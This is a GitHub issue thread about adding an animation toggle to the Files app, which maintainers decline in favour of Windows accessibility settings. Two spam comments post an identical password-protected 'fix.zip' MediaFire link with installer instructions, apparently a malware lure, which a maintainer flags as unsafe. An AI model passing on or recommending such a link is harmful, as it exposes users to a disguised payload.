### ISSUE TITLE
Disable animation toggle in Apperance

### ISSUE THREAD

**Issue by Steperman5692** [files-community/Files#16084]
### What feature or improvement do you think would benefit Files?

I was wondering if we can add a toggle in appearance to disable animation in Files.
This could be useful if people dont want flashy animations or they use Files on a low end hardware.

### Requirements

Add an on/off toggle called "Disable animations" in the Appearance tab in Files settings.

### Files Version

3.6.0.0

### Windows Version

10.0.22631.4037

**Comment by Josh65-2201** [comment]
Thanks for the feedback, Files only has a few animations and in the places it does won't effect performance even if on low end hardware. This doesn't make it worth adding a setting just for Files but can still be disable windows wide (If on low end hardware likely already is) in `Windows settings > Accessibility > Visual effects > Animations effects`

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Josh65-2201** [comment]
Dont download that

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yaira2** [comment]
Most animations are already disabled in Files, but if you'd like further control, I suggest disabling them via Windows Settings as Josh suggested.

**Comment by Steperman5692** [comment]
Ok thanks.
